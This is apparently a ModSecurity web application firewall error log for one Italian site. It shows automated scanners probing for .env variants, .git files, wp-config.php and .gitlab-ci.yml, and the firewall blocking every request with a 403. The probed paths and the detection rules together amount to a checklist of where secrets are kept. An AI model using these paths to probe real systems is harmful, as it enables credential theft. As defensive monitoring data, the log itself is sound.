[Sun Nov 16 04:19:35.589178 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlCx1UTJuGd1tZl6jZ_jgAAAAQ"]
[Sun Nov 16 04:19:35.589546 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlCx1UTJuGd1tZl6jZ_jgAAAAQ"]
[Sun Nov 16 04:19:35.589761 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlCx1UTJuGd1tZl6jZ_jgAAAAQ"]
[Sun Nov 16 04:19:36.346822 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRlCyFUTJuGd1tZl6jZ_jwAAAAQ"]
[Sun Nov 16 04:19:36.347207 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRlCyFUTJuGd1tZl6jZ_jwAAAAQ"]
[Sun Nov 16 04:19:36.347414 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRlCyFUTJuGd1tZl6jZ_jwAAAAQ"]
[Sun Nov 16 04:19:36.728871 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRlCyFUTJuGd1tZl6jZ_kAAAAAQ"]
[Sun Nov 16 04:19:36.729269 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRlCyFUTJuGd1tZl6jZ_kAAAAAQ"]
[Sun Nov 16 04:19:36.729453 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRlCyFUTJuGd1tZl6jZ_kAAAAAQ"]
[Sun Nov 16 04:19:37.229849 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRlCyVUTJuGd1tZl6jZ_kQAAAAQ"]
[Sun Nov 16 04:19:37.230261 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRlCyVUTJuGd1tZl6jZ_kQAAAAQ"]
[Sun Nov 16 04:19:37.230498 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRlCyVUTJuGd1tZl6jZ_kQAAAAQ"]
[Sun Nov 16 05:09:37.950149 2025] [:error] [pid 103402] [client 195.178.110.223:44972] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlOgVUTJuGd1tZl6jZ_mAAAAAQ"]
[Sun Nov 16 05:09:37.950430 2025] [:error] [pid 103402] [client 195.178.110.223:44972] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlOgVUTJuGd1tZl6jZ_mAAAAAQ"]
[Sun Nov 16 05:09:37.950594 2025] [:error] [pid 103402] [client 195.178.110.223:44972] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlOgVUTJuGd1tZl6jZ_mAAAAAQ"]
[Sun Nov 16 06:04:15.821849 2025] [:error] [pid 103446] [client 13.62.46.112:54486] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlbT0-c4YqyOTFJOSeIWAAAAAk"]
[Sun Nov 16 06:04:15.822108 2025] [:error] [pid 103446] [client 13.62.46.112:54486] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlbT0-c4YqyOTFJOSeIWAAAAAk"]
[Sun Nov 16 06:04:15.822281 2025] [:error] [pid 103446] [client 13.62.46.112:54486] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlbT0-c4YqyOTFJOSeIWAAAAAk"]
[Sun Nov 16 06:04:25.337530 2025] [:error] [pid 105715] [client 13.62.46.112:54494] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aRlbWTHqqjYXoy22w5Lv7wAAAAE"]
[Sun Nov 16 06:04:25.337746 2025] [:error] [pid 105715] [client 13.62.46.112:54494] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aRlbWTHqqjYXoy22w5Lv7wAAAAE"]
[Sun Nov 16 06:04:25.337914 2025] [:error] [pid 105715] [client 13.62.46.112:54494] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aRlbWTHqqjYXoy22w5Lv7wAAAAE"]
[Sun Nov 16 06:04:25.773629 2025] [:error] [pid 105733] [client 13.62.46.112:48552] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aRlbWQm3iQ6of_5tM-vZEgAAAAY"]
[Sun Nov 16 06:04:25.773845 2025] [:error] [pid 105733] [client 13.62.46.112:48552] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aRlbWQm3iQ6of_5tM-vZEgAAAAY"]
[Sun Nov 16 06:04:25.774020 2025] [:error] [pid 105733] [client 13.62.46.112:48552] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aRlbWQm3iQ6of_5tM-vZEgAAAAY"]
[Sun Nov 16 06:04:25.810650 2025] [:error] [pid 105761] [client 13.62.46.112:48574] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aRlbWRajcO0QlxhJbyzqVwAAAAo"]
[Sun Nov 16 06:04:25.810855 2025] [:error] [pid 105761] [client 13.62.46.112:48574] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aRlbWRajcO0QlxhJbyzqVwAAAAo"]
[Sun Nov 16 06:04:25.811008 2025] [:error] [pid 105761] [client 13.62.46.112:48574] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aRlbWRajcO0QlxhJbyzqVwAAAAo"]
[Sun Nov 16 06:04:25.818925 2025] [:error] [pid 105760] [client 13.62.46.112:48558] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aRlbWSX-V6YaRQK52Hc1_gAAAAU"]
[Sun Nov 16 06:04:25.819107 2025] [:error] [pid 105760] [client 13.62.46.112:48558] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aRlbWSX-V6YaRQK52Hc1_gAAAAU"]
[Sun Nov 16 06:04:25.819268 2025] [:error] [pid 105760] [client 13.62.46.112:48558] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aRlbWSX-V6YaRQK52Hc1_gAAAAU"]
[Sun Nov 16 06:04:25.845082 2025] [:error] [pid 103401] [client 13.62.46.112:48576] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aRlbWb5rejGDIGJeuSGFzAAAAAM"]
[Sun Nov 16 06:04:25.845261 2025] [:error] [pid 103401] [client 13.62.46.112:48576] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aRlbWb5rejGDIGJeuSGFzAAAAAM"]
[Sun Nov 16 06:04:25.845408 2025] [:error] [pid 103401] [client 13.62.46.112:48576] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aRlbWb5rejGDIGJeuSGFzAAAAAM"]
[Sun Nov 16 06:04:25.898025 2025] [:error] [pid 105762] [client 13.62.46.112:48578] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aRlbWYCWhPvKE5MvVu03RQAAAAs"]
[Sun Nov 16 06:04:25.898230 2025] [:error] [pid 105762] [client 13.62.46.112:48578] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aRlbWYCWhPvKE5MvVu03RQAAAAs"]
[Sun Nov 16 06:04:25.898416 2025] [:error] [pid 105762] [client 13.62.46.112:48578] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aRlbWYCWhPvKE5MvVu03RQAAAAs"]
[Sun Nov 16 06:04:25.958566 2025] [:error] [pid 105754] [client 13.62.46.112:48584] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aRlbWX3mxOhUaPa_1PS3MwAAAAw"]
[Sun Nov 16 06:04:25.958772 2025] [:error] [pid 105754] [client 13.62.46.112:48584] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aRlbWX3mxOhUaPa_1PS3MwAAAAw"]
[Sun Nov 16 06:04:25.958931 2025] [:error] [pid 105754] [client 13.62.46.112:48584] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aRlbWX3mxOhUaPa_1PS3MwAAAAw"]
[Sun Nov 16 06:04:26.028429 2025] [:error] [pid 103398] [client 13.62.46.112:48580] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aRlbWrczEoTwe_Jf335FWwAAAAA"]
